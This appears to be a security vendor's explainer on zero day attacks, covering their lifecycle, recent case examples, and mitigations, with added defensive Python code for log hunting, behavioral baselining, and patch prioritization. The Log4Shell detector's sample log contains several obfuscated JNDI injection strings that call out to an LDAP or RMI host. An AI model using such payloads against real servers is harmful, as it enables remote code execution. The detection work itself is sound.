Overview

What Is a Zero Day Attack? 

A zero day attack is a cyberattack that exploits a previously unknown software vulnerability before the vendor or developer is aware of it and has a chance to create a patch. The term "zero day" signifies that the software vendor has "zero days" to respond and fix the issue before the attack happens. 

The term is used loosely to cover three related concepts. This article focuses on the last one:

  • Zero day vulnerability: This is the security flaw in the software or hardware that is unknown to the vendor and the public. 
  • Zero day exploit: This is the method or technique used by attackers to take advantage of the zero day vulnerability. 
  • Zero day attack: This is the actual attack where the attacker uses the exploit to compromise a system or application. 

Recent examples of zero day attacks include CitrixBleed 2 (CVE‑2025‑5777), the Nippon Steel Solutions data breach, the Microsoft CLFS zero day (CVE‑2025‑29824), the Commvault (Metallic) SaaS breach (CVE-2025-3928), Log4Shell, and the Kaseya attack, all covered in more detail below.

To mitigate zero day attacks:

  • Keep software and systems updated: Patching cannot fix a flaw nobody knows about, but it removes the known vulnerabilities attackers chain together with a zero day, and it closes the exposure window fast once the vendor does ship a fix. 
  • Use runtime detection and response: Runtime detection tools watch what code actually does as it executes, so they can flag and block exploitation behavior (unexpected child processes, memory tampering, unusual outbound connections) without a signature for the specific vulnerability, shrinking the attack window. 
  • Implement a layered security approach: Employing multiple security measures like firewalls, intrusion detection/prevention systems, network segmentation, and endpoint protection limits how far an attacker can get after a successful exploit. 
  • Use threat intelligence: Track disclosed vulnerabilities, in-the-wild exploitation reports, and security advisories through threat intelligence feeds so that emergency patching can be prioritized. 
  • Educate users: Train users to recognize phishing attempts and other social engineering tactics that are commonly used to deliver zero day exploits.

Why Are Zero Day Attacks So Dangerous?

Zero day attacks are dangerous because they exploit vulnerabilities that are unknown to the software vendor or the public, leaving no immediate solution available. 

No Patch Available

When a zero day vulnerability is first discovered by attackers, there is no official fix or security update available. This creates a period where defenders have no direct way to close the security gap, and systems remain exposed. During this window, attackers can move quickly to compromise targets before a patch is released.

The absence of a patch also means that organizations must rely on temporary controls, such as restricting access or isolating vulnerable systems, which are often less effective than a permanent fix. This uncertainty makes zero day attacks especially difficult to contain in their early stages.

High Success Rate

Zero day exploits are effective because they target weaknesses that defenders do not yet know exist. Traditional security tools operate on known patterns and signatures, but zero day attacks do not match these patterns, allowing them to bypass detection. As a result, attackers can compromise systems with a higher probability of success compared to attacks against known vulnerabilities.

In addition, the secrecy around zero day vulnerabilities increases their value on black markets and within nation-state operations. This leads to rapid weaponization, where attackers quickly develop and distribute exploits, giving them an edge over defenders who are still unaware of the threat.

Potential for Widespread Impact

If a zero day vulnerability exists in widely used software, such as an operating system or a critical application, the number of potential victims can be very high. Attackers can scale their operations quickly, targeting individuals, enterprises, and government systems alike. A single exploit can be reused across thousands of organizations with little effort.

Beyond immediate compromise, attackers can use the exploit to install backdoors or maintain hidden access within networks. This persistence enables long-term surveillance, data theft, or sabotage, multiplying the overall damage. The scale and stealth of these attacks make them especially dangerous to critical infrastructure and large organizations.

Zero Day Exploit Lifecycle 

Here’s an overview of the typical lifecycle of a zero day exploit, from discovery to widespread use in the wild.

1. Discovery and Disclosure

Zero day exploits begin with the discovery of a vulnerability by a security researcher, hacker, or malicious actor. In some cases, ethical researchers will responsibly disclose the bug to the affected vendor, giving them time to craft a patch and inform users. 

However, not every discovery is handled ethically—many vulnerabilities are sold on black markets or used in secret to maximize their impact before public disclosure. The decision made at this stage—whether to disclose, sell, or exploit—shapes the entire lifecycle of the zero day.

Disclosure involves difficult ethical and strategic tradeoffs: publishing details too soon can tip off attackers before a patch exists, while withholding them leaves users unknowingly exposed. 

Vendors often work quickly, under tight secrecy, to verify reports and develop fixes once they are notified. Meanwhile, organizations without prior knowledge remain exposed, and any delay in disclosure or patch development keeps the window open for misuse by malicious actors.

2. Weaponization and Testing

Once a vulnerability is discovered, attackers may rapidly develop a proof-of-concept or a working exploit, turning the bug into a practical weapon. This process, termed weaponization, involves creating malicious payloads, custom malware, or tailored scripts that leverage the vulnerability for unauthorized access, privilege escalation, or code execution. 

Cybercriminals may then test the exploit in controlled environments to ensure reliability and evade detection by security controls. Weaponized zero days often undergo rigorous testing against different software versions, configurations, and security products to maximize their success rate. 

Skilled threat actors will modify their exploits to bypass antivirus signatures, sandbox environments, and endpoint protection tools, often adding obfuscation or stealth techniques. This testing stage ensures that once deployed in the wild, the exploit is both effective and difficult to detect, increasing the likelihood of a successful attack before remediation is available.

3. Window of Vulnerability

The period from the first exploitation of a zero day vulnerability until a patch is available and applied is known as the window of vulnerability. During this time, users of the affected software remain at significant risk: at best the vendor publishes interim workarounds, and often there is no official mitigation at all. 

Attackers take advantage of this gap to breach systems, steal data, and achieve persistence within compromised environments before defenses can be established. For organizations, this window creates significant operational risks, as systems are exposed without a clear protection strategy. 

Incident response efforts may focus on detecting indicators of compromise, isolating affected assets, or applying temporary mitigations. However, with highly targeted zero day attacks, victims may not become aware of the intrusion until long after the exploit has been used, allowing attackers to remain hidden and achieve their objectives unimpeded.

4. Propagation in Real-World Environments

When a zero day exploit is released or discovered to be in use, it can propagate rapidly across targets worldwide, especially if it is easily automatable or integrated into malware toolkits. Attackers may leverage phishing, drive-by downloads, or compromised websites to distribute the exploit, resulting in large-scale breaches. 

High-value targets, such as businesses, government agencies, and infrastructure providers, are especially vulnerable due to the critical systems and sensitive data they manage. Propagation is further enabled by the lack of available signatures and behavioral profiles for the exploit during the initial stages. 

Once security researchers and vendors learn of active exploitation, malware samples and attack vectors can be analyzed for detection. However, the initial wave of infections often goes undetected, creating widespread impact before security updates and public awareness catch up. The scale and efficiency of propagation make containment and remediation urgent priorities.


Examples of Zero Day Attacks 

CitrixBleed 2 (CVE‑2025‑5777)

CitrixBleed 2 is a critical zero day vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances that allows attackers to extract sensitive memory contents without authentication. Tracked as CVE-2025-5777, the flaw stems from insufficient input validation, enabling a memory overread attack that can reveal session tokens, user credentials, and other sensitive data.

Discovered in mid-June 2025, reports of active exploitation emerged within weeks. Security firms including ReliaQuest, Horizon3.ai, and Akamai observed widespread scanning and exploitation attempts, prompting CISA to add the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Notably, CISA issued an unusually short 24-hour deadline for federal agencies to patch affected systems, underscoring the urgency and severity of the threat.

Despite Citrix releasing a patch, many systems remain unpatched, giving attackers a window of opportunity to compromise networks. The vulnerability's resemblance to the original CitrixBleed has led researchers to warn of repeat risks, particularly given the extensive use of Citrix appliances in enterprise environments.

Nippon Steel Solutions Data Breach

In March 2025, Nippon Steel Solutions, a subsidiary of Nippon Steel, discovered unauthorized activity on its servers linked to a zero day vulnerability in unspecified network equipment. The attackers exploited the flaw to access internal systems and exfiltrate data related to customers, partners, and employees.

Customer data included names, company affiliations, job titles, and contact information. Employee records and partner contact details were also potentially exposed. Although the company reported no confirmed data leaks on the dark web, the possibility of exfiltration remains under investigation.

The incident follows earlier claims by the BianLian ransomware group of stealing hundreds of gigabytes of data from Nippon Steel USA, though it’s unclear whether the two events are connected. Nippon Steel has not confirmed BianLian’s involvement, and the zero day exploited in the March breach remains unidentified publicly.

Microsoft CLFS Zero Day (CVE‑2025‑29824)

CVE-2025-29824 is a zero day vulnerability in the Windows Common Log File System (CLFS) exploited by the threat group Storm-2460 in targeted ransomware attacks. The flaw enables privilege escalation, allowing attackers to gain system-level access from a standard user account. This access can be used to install malware, disable security features, and move laterally across networks.

Microsoft observed the vulnerability being used in attacks against sectors in the U.S., Venezuela, Spain, and Saudi Arabia. Victims included IT firms, financial institutions, and retail operations. The exploit was deployed using PipeMagic malware and affected a wide range of Windows environments, including critical infrastructure.

CLFS vulnerabilities have become a recurring target for attackers, especially ransomware operators. According to Microsoft and independent researchers, these types of flaws have become more popular for zero day exploitation due to their ability to provide deep system access without relying on remote code execution.

Commvault (Metallic) SaaS Zero-Day Breach

A zero day vulnerability in Commvault’s Metallic SaaS platform, CVE-2025-3928, has been exploited in a campaign targeting cloud-based data protection environments. The flaw, located in the Commvault Web Server, allowed remote authenticated attackers to access sensitive configuration data, including Microsoft 365 application secrets stored by Metallic.

CISA confirmed that nation-state actors used this vulnerability to access customer environments, warning that the compromise could extend to other SaaS platforms using similar configurations. The agency emphasized that the attackers could exploit default settings and over-permissive access rights to escalate their control across cloud infrastructure.

Commvault responded by releasing patches across multiple product versions for Windows and Linux. CISA added the flaw to its KEV catalog and advised organizations to monitor for indicators of compromise, audit cloud access permissions, and review application configurations to reduce exposure to similar supply chain threats.

Log4Shell

The Log4Shell vulnerability (CVE-2021-44228), disclosed in December 2021, affected Apache’s Log4j logging library, a component found in millions of Java applications across the globe. Attackers exploited it by getting a specially crafted string, such as a User-Agent header, into a log message: Log4j’s message lookup feature resolved ${jndi:...} expressions inside logged text, causing the application to fetch and execute attacker-supplied code from a remote LDAP or RMI server. 

The impact was immediate and severe, as anyone using vulnerable versions of Log4j was exposed to remote code execution without any authentication. Once revealed, Log4Shell quickly became one of the most exploited zero day vulnerabilities, affecting organizations from major enterprises to cloud service providers. 

The cross-cutting dependence on Log4j in software supply chains magnified the risk, requiring massive, coordinated patching efforts worldwide. Log4Shell illustrated the broader risk posed by deeply embedded open-source components and the far-reaching effects a single zero day vulnerability can have on the software ecosystem.
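Because the malicious lookup string has to pass through the application before it reaches Log4j, access and application logs are a practical place to hunt for exploitation attempts, provided the hunt accounts for the nested-lookup and URL-encoding tricks attackers used to hide the literal "jndi". The following detector is an added example written for this article, not code from the original page or from the Log4j project; the log lines are constructed, and the three lookup transformations it undoes (lower, upper, and the ${key:-value} default form) are an approximation of Log4j's behavior chosen for illustration.

```python
import re
from urllib.parse import unquote

# Log4j 2.x resolved nested lookups inside ${...} before evaluating the final
# ${jndi:...}, so attackers spelled "jndi" out of ${lower:j}, ${upper:n} or
# ${anything:-j} fragments to defeat naive string matching. These regexes
# approximate those transformations; they are constructed for this example.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")   # ${key:-value} -> value
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed access-log lines: one benign request, four probe variants, and a
# benign request that happens to carry a harmless (non-JNDI) lookup.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 400 "-"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/x}"',
    '10.0.0.3 - - "GET /price?currency=${date:yyyy} HTTP/1.1" 200 "curl/8.0"',
]


def normalize(text: str) -> str:
    """Undo URL encoding and collapse nested lookups until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = unquote(text)                               # also catches double encoding
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def find_log4shell_probes(lines):
    """Return (line index, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        normalized = normalize(line)
        if _JNDI.search(normalized):
            hits.append((index, normalized))
    return hits


if __name__ == "__main__":
    for index, normalized in find_log4shell_probes(SAMPLE_ACCESS_LOG):
        print(f"line {index}: {normalized}")
```

The benign ${date:yyyy} lookup on the last line is not flagged, which matters for tuning: a rule that fires on any ${...} would drown analysts in noise on applications that legitimately log such strings. Detection of this kind is retrospective; the fix was upgrading Log4j, and the interim setting log4j2.formatMsgNoLookups=true was later shown to be an incomplete mitigation.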

Kaseya Attack

In July 2021, the REvil ransomware group exploited a zero day vulnerability in Kaseya VSA, a remote monitoring and management platform used by managed service providers (MSPs) to administer client IT systems. Attackers weaponized the vulnerability to deploy ransomware on thousands of downstream customer endpoints in a supply chain attack. 

The rapid escalation and scale were enabled by the centralized nature of Kaseya’s platform, which allowed a single breach to propagate ransomware across multiple organizations in a matter of hours. The Kaseya attack demonstrated how zero day vulnerabilities in remote management tools can have an outsized impact due to their privileged access across customer environments. 

Attackers leveraged the window before detection and patching to demand ransoms, lock critical data, and disrupt operations for organizations globally. The incident underscores the supply chain risk inherent in widely deployed administrative and management solutions, especially those with internet-facing components and broad access privileges.

Best Practices for Mitigating Zero Day Attacks 

Here are some of the ways that organizations can protect themselves from the impact of zero day attacks.

1. Use Runtime Detection and Response

Runtime detection and response tools help mitigate the threat of zero day attacks by focusing on suspicious behaviors that could indicate an exploit, even when the attack signature is unknown. These systems monitor the execution of software at runtime, detecting anomalies such as unauthorized file access, unexpected memory changes, or abnormal network traffic. 

These systems can recognize the indicators of exploitation attempts, such as privilege escalation or the use of malicious payloads, that might otherwise fly under the radar of traditional security tools. Runtime detection and response tools can actively respond to potential threats by quarantining or terminating suspicious processes, blocking further attacks, or triggering alerts for investigation. 

Unlike signature-based approaches, runtime detection and response provides an adaptive layer of protection that does not rely on prior knowledge of the attack vector. Machine learning models can refine these behavioral detections over time, although they still need tuning against each environment to keep false positives manageable.

2. Threat Modeling and Profiling

Threat modeling helps organizations identify the potential attack paths an adversary might use to exploit unknown vulnerabilities. By systematically analyzing system architecture, software dependencies, and data flows, security teams can anticipate how zero day exploits could be introduced or abused. This includes identifying high-risk assets, understanding trust boundaries, and documenting how different components interact.

Profiling complements this by establishing baselines of normal behavior for users, applications, and network activity. By understanding what “normal” looks like, deviations—such as unexpected communication patterns, unusual privilege usage, or abnormal process behavior—can be flagged for further inspection. Behavioral baselining enables early detection of exploitation attempts, even if the specific vulnerability is unknown.

Integrating threat modeling and profiling into development and security workflows helps prioritize protections around critical assets and likely attack vectors. These practices inform security design decisions, guide incident response planning, and help organizations stay resilient in the face of unknown threats by focusing defenses where they matter most.
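The runtime detection described in the previous section and the behavioral baselining described here come down to the same mechanism: learn what processes normally spawn and where they normally connect, then flag and act on departures. The following is an added example written for this article, not code from the original page or from any product; the telemetry events are constructed, and the response policy (terminate off-baseline shells, alert on everything else) is an illustrative choice rather than a recommendation.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One runtime telemetry record: a process start or an outbound connection."""
    kind: str            # "process" or "network"
    image: str           # executable name of the acting process
    parent: str = ""     # parent image (process events only)
    dst_port: int = 0    # destination port (network events only)


class BehaviorBaseline:
    """Learns which parent->child pairs and image->port pairs are normal."""

    def __init__(self):
        self.children = defaultdict(set)   # parent image -> child images observed
        self.ports = defaultdict(set)      # image -> destination ports observed

    def learn(self, events):
        for e in events:
            if e.kind == "process":
                self.children[e.parent].add(e.image)
            elif e.kind == "network":
                self.ports[e.image].add(e.dst_port)

    def deviations(self, e):
        """Reasons this event departs from the learned baseline (empty if none)."""
        reasons = []
        if e.kind == "process" and e.image not in self.children.get(e.parent, set()):
            reasons.append(f"unseen process tree {e.parent} -> {e.image}")
        elif e.kind == "network":
            if e.image not in self.ports:
                reasons.append(f"{e.image} made no outbound connections during baselining")
            elif e.dst_port not in self.ports[e.image]:
                reasons.append(f"{e.image} connecting to unseen port {e.dst_port}")
        return reasons


# Constructed response policy: an interactive shell spawned off-baseline is
# terminated; any other deviation is raised for an analyst.
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "sh", "bash"}


def triage(baseline, events):
    """Return (event, reasons, action) for each event that deviates from baseline."""
    findings = []
    for e in events:
        reasons = baseline.deviations(e)
        if not reasons:
            continue
        action = "terminate" if e.kind == "process" and e.image in SHELLS else "alert"
        findings.append((e, reasons, action))
    return findings


# Constructed "known good" window used to build the baseline.
BASELINE_EVENTS = [
    Event("process", "explorer.exe", parent="userinit.exe"),
    Event("process", "winword.exe", parent="explorer.exe"),
    Event("process", "chrome.exe", parent="explorer.exe"),
    Event("process", "svchost.exe", parent="services.exe"),
    Event("network", "chrome.exe", dst_port=443),
    Event("network", "chrome.exe", dst_port=80),
    Event("network", "svchost.exe", dst_port=443),
]

# Constructed live telemetry: a document opens normally, then spawns a shell
# and the document handler itself reaches out to an unfamiliar port.
LIVE_EVENTS = [
    Event("process", "winword.exe", parent="explorer.exe"),
    Event("process", "powershell.exe", parent="winword.exe"),
    Event("network", "winword.exe", dst_port=4444),
    Event("network", "chrome.exe", dst_port=443),
]


if __name__ == "__main__":
    baseline = BehaviorBaseline()
    baseline.learn(BASELINE_EVENTS)
    for event, reasons, action in triage(baseline, LIVE_EVENTS):
        print(f"{action.upper():9} {event.image}: {'; '.join(reasons)}")
```

Nothing here knows which vulnerability was exploited; the shell spawned by a word processor and the word processor's outbound connection are anomalous regardless of the bug that caused them. The weak point is the learning window: if the baseline is collected while an attacker is already present, their activity becomes "normal", so the baseline period should be reviewed and periodically re-learned rather than trusted once.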

3. Implement a Layered Security Approach

A layered security approach (or defense-in-depth) recognizes that relying on a single line of defense is insufficient when dealing with zero day attacks. Instead, it employs multiple security layers to protect assets, so even if one layer fails, others can still provide defense. 

For example, network security can be strengthened by using firewalls, intrusion detection/prevention systems (IDS/IPS), and segmentation, which limits the movement of attackers within the network if a zero day exploit is used to gain initial access.

Endpoint security tools such as antivirus software, behavioral monitoring, and endpoint detection and response (EDR) systems add another layer of defense, looking for malicious activity that may arise from an exploited vulnerability. Additionally, identity and access management (IAM) practices, such as multi-factor authentication (MFA) and the principle of least privilege, can limit the damage an attacker can cause if they gain initial access.

4. Use Proactive Threat Intelligence

Threat intelligence assists in staying ahead of zero day threats by providing organizations with actionable information about emerging vulnerabilities, attack techniques, and threat actor behaviors. By subscribing to threat intelligence feeds and partnering with threat-sharing organizations, businesses can access early warnings about potential zero day exploits. 

This intelligence can be integrated into security operations centers (SOCs) to help detect unusual activities or preemptively block attack techniques, such as phishing campaigns or exploit kits targeting zero day vulnerabilities. Threat intelligence can also be used to tailor vulnerability management efforts, ensuring that resources are focused on addressing the most critical and relevant threats. 

Threat intelligence platforms often provide data about known threat actors and their tactics, which can help organizations prepare for attack campaigns. When used effectively, proactive threat intelligence allows security teams to adapt quickly to emerging risks and prioritize their defense strategies before an attack is launched.
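One concrete way to feed threat intelligence into vulnerability management is to rank scanner findings against a catalog of vulnerabilities known to be exploited in the wild, such as CISA's KEV catalog referenced above, so that the handful of CVEs attackers are actually using get fixed first. The following is an added example written for this article, not code from the original page or from CISA; the feed is a constructed sample in the shape of the KEV JSON, and while the CVE IDs are the ones discussed in this article, the dates and ransomware flags are illustrative placeholders, not the catalog's real entries. CVE-2099-0001 is a deliberately fake placeholder standing in for a finding that is not in the catalog.

```python
import json
from datetime import date

# Constructed sample in the shape of CISA's KEV JSON feed. Dates and the
# ransomware flag are placeholders for illustration, not the real entries.
KEV_SAMPLE = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2025-29824", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2025-04-08", "dueDate": "2025-04-29", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2025-3928", "vendorProject": "Commvault", "product": "Web Server",
     "dateAdded": "2025-04-28", "dueDate": "2025-05-17", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-5777", "vendorProject": "Citrix", "product": "NetScaler ADC and Gateway",
     "dateAdded": "2025-07-10", "dueDate": "2025-07-11", "knownRansomwareCampaignUse": "Unknown"},
]})

# Constructed vulnerability-scanner output: one row per (host, CVE).
SCAN_FINDINGS = [
    {"host": "fileserver-02", "cve": "CVE-2099-0001"},   # placeholder, deliberately not in KEV
    {"host": "vpn-gw-01", "cve": "CVE-2025-5777"},
    {"host": "backup-saas-admin", "cve": "CVE-2025-3928"},
    {"host": "fileserver-02", "cve": "CVE-2025-29824"},
]

REFERENCE_DAY = date(2025, 7, 10)   # "today" for the worked example


def load_kev(feed_json):
    """Index a KEV-style feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


def prioritize(findings, kev, today):
    """Order scanner findings: KEV entries first, most overdue first, ransomware breaks ties."""
    rows = []
    for finding in findings:
        entry = kev.get(finding["cve"])
        if entry is None:
            rows.append({**finding, "in_kev": False, "days_left": None, "ransomware": False})
            continue
        due = date.fromisoformat(entry["dueDate"])
        rows.append({**finding, "in_kev": True,
                     "days_left": (due - today).days,          # negative means overdue
                     "ransomware": entry["knownRansomwareCampaignUse"] == "Known"})
    # Non-KEV findings sort last and keep scanner order; sort() is stable.
    rows.sort(key=lambda r: (not r["in_kev"],
                             r["days_left"] if r["in_kev"] else 0,
                             not r["ransomware"]))
    return rows


def prioritize_sample():
    """Run the worked example on the constructed feed and findings."""
    return prioritize(SCAN_FINDINGS, load_kev(KEV_SAMPLE), REFERENCE_DAY)


if __name__ == "__main__":
    for row in prioritize_sample():
        status = f"{row['days_left']:+d} days" if row["in_kev"] else "not in KEV"
        print(f"{row['host']:18} {row['cve']:16} {status}")
```

The ordering puts the two long-overdue catalog entries ahead of the Citrix appliance whose deadline is tomorrow, and the uncatalogued finding last. In practice this list is a starting point, not an answer: a finding outside the catalog can still be the one an attacker is using against you, which is exactly the gap the runtime detection practices above are meant to cover.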

Zero Day Attack Protection with Oligo Security

Oligo delivers protection against zero-day attacks by monitoring open-source components in real time and understanding their actual runtime behavior. Instead of relying solely on static signatures, Oligo identifies and blocks only exploitable vulnerabilities in active code paths, dramatically reducing false positives. Because detection keys on behavior rather than on a signature for a specific CVE, exploitation attempts against unknown or unpatched vulnerabilities can be caught and blocked as they occur.

Expert Tips

Gal Elbaz
Co-Founder & CTO, Oligo Security

Gal Elbaz is the Co-Founder and CTO at Oligo Security, bringing over a decade of expertise in vulnerability research and ethical hacking. Gal started his career as a security engineer in the IDF's elite intelligence unit. Later on, he joined Check Point, where he was instrumental in building the research team and served as a senior security researcher. In his free time, Gal enjoys playing the guitar and participating in CTF (Capture The Flag) challenges.

In my experience, here are tips that can help you better prepare for and mitigate zero day attacks:

  1. Implement exploit mitigations at the OS level: Enable platform-level defenses like ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and Control Flow Guard to reduce the success of exploits, even for unpatched vulnerabilities.
  2. Use application isolation and sandboxing: Run high-risk applications (e.g., browsers, PDF readers) in isolated sandboxes or virtualized containers to prevent zero day exploits from pivoting into the broader system.
  3. Adopt a threat-hunting mindset: Don’t wait for alerts—proactively hunt for anomalies such as suspicious outbound connections, unsigned binaries, or unusual process trees that could indicate exploitation attempts.
  4. Harden third-party and legacy software: Identify and minimize the use of outdated or unnecessary software components that often become the weakest link in the attack chain. For legacy systems, use virtual patching via WAFs or endpoint protection platforms.
  5. Deploy canary tokens and deception technologies: Plant fake credentials, files, or services in the environment to detect attackers who have bypassed perimeter defenses and are exploring internal systems using a zero day.
